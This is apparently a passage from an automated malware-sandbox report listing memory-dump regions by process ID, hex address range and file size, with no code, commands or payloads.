memory/1688-559-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/1688-169-0x0000000000000000-mapping.dmp
-
memory/2088-171-0x0000000000000000-mapping.dmp
-
memory/2248-189-0x0000000000000000-mapping.dmp
-
memory/2340-546-0x00000000008C0000-0x0000000000994000-memory.dmpFilesize
848KB
-
memory/2340-333-0x0000000000000000-mapping.dmp
-
memory/2936-460-0x000000001B1A0000-0x000000001B1A2000-memory.dmpFilesize
8KB
-
memory/2960-618-0x0000000005AD0000-0x0000000005AD1000-memory.dmpFilesize
4KB
-
memory/3108-477-0x000000001B5C0000-0x000000001B5C2000-memory.dmpFilesize
8KB
-
memory/3220-596-0x00000000042F0000-0x0000000004305000-memory.dmpFilesize
84KB
-
memory/3312-599-0x0000000000DB0000-0x0000000000DB1000-memory.dmpFilesize
4KB
-
memory/3564-199-0x0000000000000000-mapping.dmp
-
memory/3564-223-0x0000000000020000-0x0000000000021000-memory.dmpFilesize
4KB
-
memory/3564-243-0x0000000002200000-0x0000000002202000-memory.dmpFilesize
8KB
-
memory/3804-198-0x0000000000000000-mapping.dmp
-
memory/3836-173-0x0000000000000000-mapping.dmp
-
memory/3840-316-0x0000000000EE0000-0x0000000000EE1000-memory.dmpFilesize
4KB
-
memory/3840-312-0x0000000000000000-mapping.dmp
-
memory/3840-338-0x0000000003090000-0x0000000003092000-memory.dmpFilesize
8KB
-
memory/3864-176-0x0000000000000000-mapping.dmp
-
memory/3928-207-0x0000000000000000-mapping.dmp
-
memory/4072-351-0x0000000000000000-mapping.dmp
-
memory/4072-397-0x00000000052F0000-0x00000000052F1000-memory.dmpFilesize
4KB
-
memory/4140-344-0x0000000000000000-mapping.dmp
-
memory/4140-482-0x00000000061C0000-0x00000000061C1000-memory.dmpFilesize
4KB
-
memory/4152-146-0x0000000000000000-mapping.dmp
-
memory/4152-322-0x0000000000000000-mapping.dmp
-
memory/4164-177-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4164-149-0x0000000000000000-mapping.dmp
-
memory/4164-163-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/4164-164-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/4164-180-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4164-183-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4164-174-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4164-165-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/4176-359-0x0000000000000000-mapping.dmp
-
memory/4176-447-0x00000000058F0000-0x00000000058F1000-memory.dmpFilesize
4KB
-
memory/4348-201-0x0000000000000000-mapping.dmp
-
memory/4388-336-0x0000000002C90000-0x0000000002CA2000-memory.dmpFilesize
72KB
-
memory/4388-334-0x0000000002C70000-0x0000000002C80000-memory.dmpFilesize
64KB
-
memory/4388-321-0x0000000000000000-mapping.dmp
-
memory/4548-392-0x000000007F240000-0x000000007F241000-memory.dmpFilesize
4KB
-
memory/4548-237-0x0000000006F70000-0x0000000006F71000-memory.dmpFilesize
4KB
-
memory/4548-264-0x00000000086B0000-0x00000000086B1000-memory.dmpFilesize
4KB
-
memory/4548-620-0x0000000006F77000-0x0000000006F78000-memory.dmpFilesize
4KB
-
memory/4548-284-0x00000000087D0000-0x00000000087D1000-memory.dmpFilesize
4KB
-
memory/4548-252-0x0000000007F10000-0x0000000007F11000-memory.dmpFilesize
4KB
-
memory/4548-256-0x0000000008350000-0x0000000008351000-memory.dmpFilesize
4KB
-
memory/4548-187-0x0000000000000000-mapping.dmp
-
memory/4548-250-0x0000000007EA0000-0x0000000007EA1000-memory.dmpFilesize
4KB
-
memory/4548-355-0x0000000006F75000-0x0000000006F77000-memory.dmpFilesize
8KB
-
memory/4548-249-0x00000000080C0000-0x00000000080C1000-memory.dmpFilesize
4KB
-
memory/4548-225-0x0000000006F80000-0x0000000006F81000-memory.dmpFilesize
4KB
-
memory/4548-231-0x00000000075F0000-0x00000000075F1000-memory.dmpFilesize
4KB
-
memory/4548-247-0x0000000007E00000-0x0000000007E01000-memory.dmpFilesize
4KB
-
memory/4548-246-0x0000000007D90000-0x0000000007D91000-memory.dmpFilesize
4KB
-
memory/4548-241-0x0000000006F72000-0x0000000006F73000-memory.dmpFilesize
4KB
-
memory/4556-595-0x00000000060D0000-0x0000000006213000-memory.dmpFilesize
1.3MB
-
memory/4624-210-0x0000000000000000-mapping.dmp
-
memory/4628-222-0x0000000000170000-0x0000000000171000-memory.dmpFilesize
4KB
-
memory/4628-242-0x000000001ADC0000-0x000000001ADC2000-memory.dmpFilesize
8KB
-
memory/4628-353-0x0000000000000000-mapping.dmp
-
memory/4628-206-0x0000000000000000-mapping.dmp
-
memory/4644-441-0x0000000000800000-0x0000000000801000-memory.dmpFilesize
4KB
-
memory/4648-254-0x00000000053E0000-0x00000000053E1000-memory.dmpFilesize
4KB
-
memory/4648-208-0x0000000000000000-mapping.dmp
-
memory/4648-244-0x0000000004C00000-0x0000000004C01000-memory.dmpFilesize
4KB
-
memory/4648-240-0x0000000004C80000-0x0000000004C81000-memory.dmpFilesize
4KB
-
memory/4648-227-0x0000000000300000-0x0000000000301000-memory.dmpFilesize
4KB
-
memory/4648-248-0x0000000004E20000-0x0000000004E21000-memory.dmpFilesize
4KB
-
memory/4704-209-0x0000000000000000-mapping.dmp
-
memory/4704-221-0x0000000000400000-0x000000000042C000-memory.dmpFilesize
176KB
-
memory/4736-383-0x00000000005C0000-0x00000000005F0000-memory.dmpFilesize
192KB
-
memory/4736-197-0x0000000000000000-mapping.dmp
-
memory/4752-259-0x0000000005A00000-0x0000000005B43000-memory.dmpFilesize
1.3MB
-
memory/4752-188-0x0000000000000000-mapping.dmp
-
memory/4964-166-0x0000000000000000-mapping.dmp
-
memory/4984-185-0x0000000000000000-mapping.dmp
-
memory/5000-272-0x00000000039E0000-0x00000000039E1000-memory.dmpFilesize
4KB
-
memory/5000-253-0x0000000000F70000-0x0000000000F71000-memory.dmpFilesize
4KB
-
memory/5000-219-0x0000000000000000-mapping.dmp
-
memory/5000-263-0x0000000005C00000-0x0000000005C01000-memory.dmpFilesize
4KB
-
memory/5000-262-0x0000000005DE0000-0x0000000005DE1000-memory.dmpFilesize
4KB
-
memory/5000-260-0x0000000005CD0000-0x0000000005CD1000-memory.dmpFilesize
4KB
-
memory/5000-258-0x0000000005BA0000-0x0000000005BA1000-memory.dmpFilesize
4KB
-
memory/5000-276-0x0000000005F50000-0x0000000005F51000-memory.dmpFilesize
4KB
-
memory/5000-257-0x00000000061C0000-0x00000000061C1000-memory.dmpFilesize
4KB
-
memory/5028-167-0x0000000000000000-mapping.dmp
-
memory/5032-179-0x0000000000000000-mapping.dmp
-
memory/5148-226-0x0000000000000000-mapping.dmp
-
memory/5168-339-0x0000000000000000-mapping.dmp
-
memory/5172-307-0x0000000000000000-mapping.dmp
-
memory/5228-239-0x0000000000720000-0x0000000000721000-memory.dmpFilesize
4KB
-
memory/5228-230-0x0000000000000000-mapping.dmp
-
memory/5244-568-0x0000000004BA0000-0x0000000004BA1000-memory.dmpFilesize
4KB
-
memory/5280-233-0x0000000000000000-mapping.dmp
-
memory/5280-417-0x0000000000610000-0x0000000000658000-memory.dmpFilesize
288KB
-
memory/5304-357-0x0000000000000000-mapping.dmp
-
memory/5308-235-0x0000000000000000-mapping.dmp
-
memory/5356-433-0x0000000005E60000-0x0000000005E61000-memory.dmpFilesize
4KB
-
memory/5356-329-0x0000000000000000-mapping.dmp
-
memory/5404-349-0x0000000000000000-mapping.dmp
-
memory/5560-245-0x0000000000000000-mapping.dmp
-
memory/5692-347-0x0000000000000000-mapping.dmp
-
memory/5692-358-0x0000000002740000-0x0000000002742000-memory.dmpFilesize
8KB
-
memory/5696-294-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/5696-293-0x0000000000000000-mapping.dmp
-
memory/5696-330-0x0000000005380000-0x0000000005998000-memory.dmpFilesize
6.1MB
-
memory/5732-342-0x0000000000000000-mapping.dmp
-
memory/5732-423-0x0000000000850000-0x0000000000885000-memory.dmpFilesize
212KB
-
memory/5768-451-0x00000000007D0000-0x00000000007E2000-memory.dmpFilesize
72KB
-
memory/5768-427-0x00000000007B0000-0x00000000007C0000-memory.dmpFilesize
64KB
-
memory/5792-267-0x0000000000000000-mapping.dmp
-
memory/5792-291-0x0000000001290000-0x0000000001292000-memory.dmpFilesize
8KB
-
memory/5816-286-0x00000000005A0000-0x00000000005A1000-memory.dmpFilesize
4KB
-
memory/5816-337-0x0000000007F50000-0x0000000007F51000-memory.dmpFilesize
4KB
-
memory/5816-268-0x0000000000000000-mapping.dmp
-
memory/5816-318-0x0000000004850000-0x000000000488E000-memory.dmpFilesize
248KB
-
memory/5816-327-0x00000000048A0000-0x00000000048A1000-memory.dmpFilesize
4KB
-
memory/5816-331-0x0000000004FF0000-0x0000000004FF1000-memory.dmpFilesize
4KB
-
memory/5816-306-0x0000000002720000-0x0000000002721000-memory.dmpFilesize
4KB
-
memory/5816-335-0x0000000007850000-0x0000000007851000-memory.dmpFilesize
4KB
-
memory/5856-277-0x0000000000AA0000-0x0000000000AA1000-memory.dmpFilesize
4KB
-
memory/5856-273-0x0000000000000000-mapping.dmp
-
memory/5944-279-0x0000000000000000-mapping.dmp
-
memory/5944-295-0x00000000024F0000-0x00000000024F1000-memory.dmpFilesize
4KB
-
memory/5944-285-0x00000000003E0000-0x00000000003E1000-memory.dmpFilesize
4KB
-
memory/6020-283-0x0000000000000000-mapping.dmp
-
memory/6124-305-0x0000000000CC0000-0x0000000000CC1000-memory.dmpFilesize
4KB
-
memory/6124-296-0x0000000000000000-mapping.dmp
-
memory/6124-455-0x00000000034B0000-0x00000000034B2000-memory.dmpFilesize
8KB
-
memory/6140-300-0x0000000000000000-mapping.dmp
-
memory/6200-613-0x00000000004E0000-0x00000000004E9000-memory.dmpFilesize
36KB
-
memory/6200-363-0x0000000000000000-mapping.dmp
-
memory/6256-364-0x0000000000000000-mapping.dmp
-
memory/6256-372-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/6288-531-0x0000000002C90000-0x0000000002CBF000-memory.dmpFilesize
188KB
-
memory/6288-365-0x0000000000000000-mapping.dmp
-
memory/6304-555-0x00000000008A0000-0x0000000000976000-memory.dmpFilesize
856KB
-
memory/6304-366-0x0000000000000000-mapping.dmp
-
memory/6336-367-0x0000000000000000-mapping.dmp
-
memory/6348-515-0x0000000005500000-0x0000000005501000-memory.dmpFilesize
4KB
-
memory/6348-368-0x0000000000000000-mapping.dmp
-
memory/6364-369-0x0000000000000000-mapping.dmp
-
memory/6372-370-0x0000000000000000-mapping.dmp
-
memory/6380-616-0x0000000002140000-0x0000000002170000-memory.dmpFilesize
192KB
-
memory/6396-509-0x0000000000400000-0x0000000004A15000-memory.dmpFilesize
70.1MB
-
memory/6396-437-0x0000000006700000-0x000000000AC2E000-memory.dmpFilesize
69.2MB
-
memory/6416-400-0x0000000005290000-0x000000000532C000-memory.dmpFilesize
624KB
-
memory/6452-580-0x0000000005070000-0x0000000005071000-memory.dmpFilesize
4KB
-
memory/6480-504-0x0000000005AC0000-0x0000000005AC1000-memory.dmpFilesize
4KB
-
memory/6488-560-0x00000000005E0000-0x00000000005E9000-memory.dmpFilesize
36KB
-
memory/6512-562-0x0000000000820000-0x00000000008F4000-memory.dmpFilesize
848KB
-
memory/6520-529-0x00000000055E0000-0x00000000055E1000-memory.dmpFilesize
4KB
-
memory/6684-467-0x0000000002720000-0x0000000002721000-memory.dmpFilesize
4KB
-
memory/6808-387-0x00000000020A0000-0x00000000020A1000-memory.dmpFilesize
4KB
-
memory/6820-583-0x0000000005AF0000-0x0000000005AF1000-memory.dmpFilesize
4KB
-
memory/6856-474-0x0000000004FA0000-0x0000000004FA1000-memory.dmpFilesize
4KB